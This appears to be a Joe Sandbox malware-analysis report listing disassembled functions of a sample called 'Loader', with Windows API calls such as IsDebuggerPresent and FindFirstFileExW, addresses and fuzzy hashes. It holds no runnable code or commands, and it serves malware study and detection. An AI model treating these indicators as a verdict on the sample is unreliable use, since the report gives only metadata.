Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 0594797cdd572dfd6361d1fa1c89c1a3f7925d437b8a4b8cadec458b36fdf47e
Instruction ID: b1ec24fbffcb299ffdf07978b1a6e6e05714fb3850e8383180ebe8bf3a48851d
Opcode Fuzzy Hash: 0594797cdd572dfd6361d1fa1c89c1a3f7925d437b8a4b8cadec458b36fdf47e
Instruction Fuzzy Hash: CB21F92AA001449ADB388B55C94179773A6EF90B68F5E9026E80AF7310E731DD42E3D0

Function 00ED0DA9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED0E99

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: b2d9f2469af023ddc3c30cebd123717b41b5f4d0d9f06c5d28fe51389b989e9b
Instruction ID: 22a29920c7d53a93da275ec8971d224237e2b005441335659cc7492cde7e7ec4
Opcode Fuzzy Hash: b2d9f2469af023ddc3c30cebd123717b41b5f4d0d9f06c5d28fe51389b989e9b
Instruction Fuzzy Hash: 0C71D27194515C6FDF30AF24CC89BAEBBB9EB05308F1851DAE409B7351EA315E868F10

Function 00EBE42C Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00EBE438
IsDebuggerPresent.KERNEL32 ref: 00EBE504
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EBE51D
UnhandledExceptionFilter.KERNEL32(?), ref: 00EBE527

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 157811f0cf929d448ce4bc6303d7c5355ae894509ddaf118535834ffefa1a6eb
Instruction ID: bf2f94e5c44a02140c404377765d91ba14535ab9a097f871884b37a7e6de7f12
Opcode Fuzzy Hash: 157811f0cf929d448ce4bc6303d7c5355ae894509ddaf118535834ffefa1a6eb
Instruction Fuzzy Hash: 3731D8B5D0121C9BDB21DFA5D9897CDBBF8AF08304F1041EAE40DAB250EB759A85CF45

Function 00ED034E Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00ED03A2
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00ED03EC
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00ED04B2

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: da18c4fb06d59c714e69c8aeb4972c6de07166f04ab46d930bb44e6b7adb1895
Instruction ID: d74e960488a182381c680fdec58e8dfd3adf4797b9f610cda0dc091562d5c4c1
Opcode Fuzzy Hash: da18c4fb06d59c714e69c8aeb4972c6de07166f04ab46d930bb44e6b7adb1895
Instruction Fuzzy Hash: BE61A0719001079FEB28DF25DD82BAA77A8FF44304F18517AED15EA681EB34D982DF90

Function 00EC72FD Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00EC73F5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00EC73FF
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00EC740C

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9112da750e51bc3efd03c41e9b9add7c38b59a7c7431bffded667976a33687d9
Instruction ID: d603abff9aa36782bbaeac7954d66ae75ac3a11e46e60f7a1821549197c2f899
Opcode Fuzzy Hash: 9112da750e51bc3efd03c41e9b9add7c38b59a7c7431bffded667976a33687d9
Instruction Fuzzy Hash: A431A2749012199BCB21DF65D989BCDBBF8BF08310F5051EAE41CB72A1E7709B858F44

Function 00EBEB50 Relevance: 3.0, APIs: 2, Instructions: 27timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00EBEA53,?,?,?,?,00EBEA77,000000FF,?,?,?,00EBE971,00000000), ref: 00EBEB88
GetSystemTimeAsFileTime.KERNEL32(?,C4C39003,?,?,00EDB30E,000000FF,?,00EBEA53,?,?,?,?,00EBEA77,000000FF,?), ref: 00EBEB8C

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: Time$FileSystem$Precise
String ID:
API String ID: 743729956-0
Opcode ID: 5b30f0cd4cf5e5aa4c0fdad30d96933234eef8d2173d6e83bc75dfac277293b5
Instruction ID: 1cffd6e8d65f81fc652c0cc338a2ddcfa54e97d9447b79bdec6d8c6ad105dab4
Opcode Fuzzy Hash: 5b30f0cd4cf5e5aa4c0fdad30d96933234eef8d2173d6e83bc75dfac277293b5
Instruction Fuzzy Hash: D9F03776944558DFC7119F45DC81F9977A8E708B50F01426AF812A77D0D77459048BD4

Function 00ED43FF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00ED435A,?,?,?,?,?,?,00000000), ref: 00ED462C

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: d29da587ea7ec99406393c8f55f1c4eab44674b1e6329402439dc89899dbffed
Instruction ID: c4e7b0134414a6d072ecba0d85bb602ef02d2e4797a3fe1ec0a2b2c37833062e
Opcode Fuzzy Hash: d29da587ea7ec99406393c8f55f1c4eab44674b1e6329402439dc89899dbffed
Instruction Fuzzy Hash: BDB14DB11106089FD715CF28C48ABA47BE0FF55368F25965AE8AADF3E1C335D992CB40

Function 00EBE094 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00EBE0AA

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 7485bcf38b9406e9713827ef8fe9421574324a2818d9e17bb72176cf555e7b6c
Instruction ID: d61fbb86313ee9c9c1947ef659d43b0797ea57766dbf6a8af4ff97f8c9e581d7
Opcode Fuzzy Hash: 7485bcf38b9406e9713827ef8fe9421574324a2818d9e17bb72176cf555e7b6c
Instruction Fuzzy Hash: F5A15BB19016498FDB18CF5AD8C16DABBF1FB58364F28912AE451FB3A0D3349848CF54

Function 00ED0CF8 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00ECC0E0: HeapAlloc.KERNEL32(00000008,?,?,?,00ECB000,00000001,00000364,?,00000005,000000FF,?,00EC495A,00EE56B0,0000000C), ref: 00ECC121

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED0E99
FindNextFileW.KERNEL32(00000000,?), ref: 00ED0F8D
FindClose.KERNEL32(00000000), ref: 00ED0FCC
FindClose.KERNEL32(00000000), ref: 00ED0FFF

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: d8efe53e81cf7ac075f0a7349e3f1e9cd2c722c5d8ab931dfaa861150161c643
Instruction ID: 62690f5903a6f2724b25ef64c91e848892e902ba26eeba2144265c08850f016e
Opcode Fuzzy Hash: d8efe53e81cf7ac075f0a7349e3f1e9cd2c722c5d8ab931dfaa861150161c643
Instruction Fuzzy Hash: FC5129719001186FDF249F689C85BBE7BAADB45318F18619FF819B7301EA319D439B60

Function 00EC3EA0 Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

0, xrefs: 00EC4010

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 7c3931074ef244733a7b6f00ce4504df995dc7f937aca642667215a0a12cb5af
Instruction ID: 911c9073d06eb231f0fe8d54449b603ea6f70905eb52f413fa4207e7c742cca6
Opcode Fuzzy Hash: 7c3931074ef244733a7b6f00ce4504df995dc7f937aca642667215a0a12cb5af
Instruction Fuzzy Hash: 02C1E474A007468FCB24CE78C695FBAB7B1AB15308F14AA1CD592B7691C3339E47CB51

Function 00ED0600 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00ED0654

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b61e3995da0f6a2a870f5f7f17ef57a433af0bce54cb1308441af4976bf56afb
Instruction ID: e2895047b10c23705cd8d7dfee49fb6ce2a073116208c2e4a9e567f937ba3b34
Opcode Fuzzy Hash: b61e3995da0f6a2a870f5f7f17ef57a433af0bce54cb1308441af4976bf56afb
Instruction Fuzzy Hash: A921D372601206ABDB289B15DD42FBA73E8EF84314F18107EFD11E6641EB75DD128B54

Function 00EC2AA1 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 00EC2C25

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: f895735ce8c31b6f3cecf8524a5471a1ff31125fe61762b44ebbdf9ad6e75e47
Instruction ID: f9b20d806dfd8ecdb9910206770cf87381cad0db78c530ade0599481c73b9547
Opcode Fuzzy Hash: f895735ce8c31b6f3cecf8524a5471a1ff31125fe61762b44ebbdf9ad6e75e47
Instruction Fuzzy Hash: 0BB1C03090060B8BCB28DE68C755FBEBBB1AB14318F14261DEA52B7691C7379E43DB51

Function 00ED02B3 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059

EnumSystemLocalesW.KERNEL32(00ED034E,00000001,00000000,?,-00000050,?,00ED013E,00000000,-00000002,00000000,?,00000055,?), ref: 00ED0325

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a1e852ddc8e12c1745e6965d104b362e70264555a204051beb662e4af6a04c0d
Instruction ID: c3fd8af697ee19d080e5b35e009c8c308d0921ae917971eb9799b2a160b9b7ec
Opcode Fuzzy Hash: a1e852ddc8e12c1745e6965d104b362e70264555a204051beb662e4af6a04c0d
Instruction Fuzzy Hash: 8111E9366047059FDB189F39D89177AB791FF84368F18442EE54697B41D371A943CB40

Function 00ED0720 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00ED0774

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 4b21e3273cc5343afd530245b4a22da27e217c5ccbe30ca9326d04a95f2302b6
Instruction ID: 6ac942492ae2386fb772ea00857fbc34a28cec11d7db945b406d54a9e78f8c89
Opcode Fuzzy Hash: 4b21e3273cc5343afd530245b4a22da27e217c5ccbe30ca9326d04a95f2302b6
Instruction Fuzzy Hash: F511E372600106ABD714EB28DD42AAA77ECEF04314F14117BF505EB341EB74ED058B90

Function 00ED08CD Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00ED056A,00000000,00000000,?), ref: 00ED08F9

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: a7180bd506aa70b9005db8c5e6b54c2443802d818f3e157c042bb276c0575c9b
Instruction ID: 9f20066f4d53fbbfcc6e71ac3bd47b0afd0d3d670538c0309b000d6a2b0289e6
Opcode Fuzzy Hash: a7180bd506aa70b9005db8c5e6b54c2443802d818f3e157c042bb276c0575c9b
Instruction Fuzzy Hash: 5701DB32610116BFEB2856258815BBA7754DBC0358F19542EEC46B3281EA70EE43CAD0

Function 00ED05A1 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059

EnumSystemLocalesW.KERNEL32(00ED0600,00000001,?,?,-00000050,?,00ED0106,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00ED05EB

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 484b7a035d126b4a1d92361eb7c4e0b6cdb0bc77bffa5a964a3d45c9ded52201
Instruction ID: 681852dd2e4d529ae69d9a2d8653d9ddf9b037ab4cfb3e0208d6871fb9dbd611
Opcode Fuzzy Hash: 484b7a035d126b4a1d92361eb7c4e0b6cdb0bc77bffa5a964a3d45c9ded52201
Instruction Fuzzy Hash: 2FF0C2362003045FEB245F39A881B6A7B91EB80368F09442EF9465BB80D6B1AC038A50

Function 00ECBFF0 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00EC7594: EnterCriticalSection.KERNEL32(?,?,00ECB440,?,00EE5B00,00000008,00ECB332,?,?,?), ref: 00EC75A3

EnumSystemLocalesW.KERNEL32(00ECBFE3,00000001,00EE5B80,0000000C,00ECB948,-00000050), ref: 00ECC028

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: e1f2340839a3314596da290b2c6df1fd7b2da69d764c7d2c72b44ba56fa088d2
Instruction ID: 279b2057fed1317c1f09acc7d69261fd1b394b4c6581bb84aeda690b16615133
Opcode Fuzzy Hash: e1f2340839a3314596da290b2c6df1fd7b2da69d764c7d2c72b44ba56fa088d2
Instruction Fuzzy Hash: AEF03772A40348DFDB00EF99E942B9E7BE0EB08725F10516AF515AB3A0DB7649058F50

Function 00ED06D5 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059

EnumSystemLocalesW.KERNEL32(00ED0720,00000001,?,?,?,00ED0160,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00ED070C

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

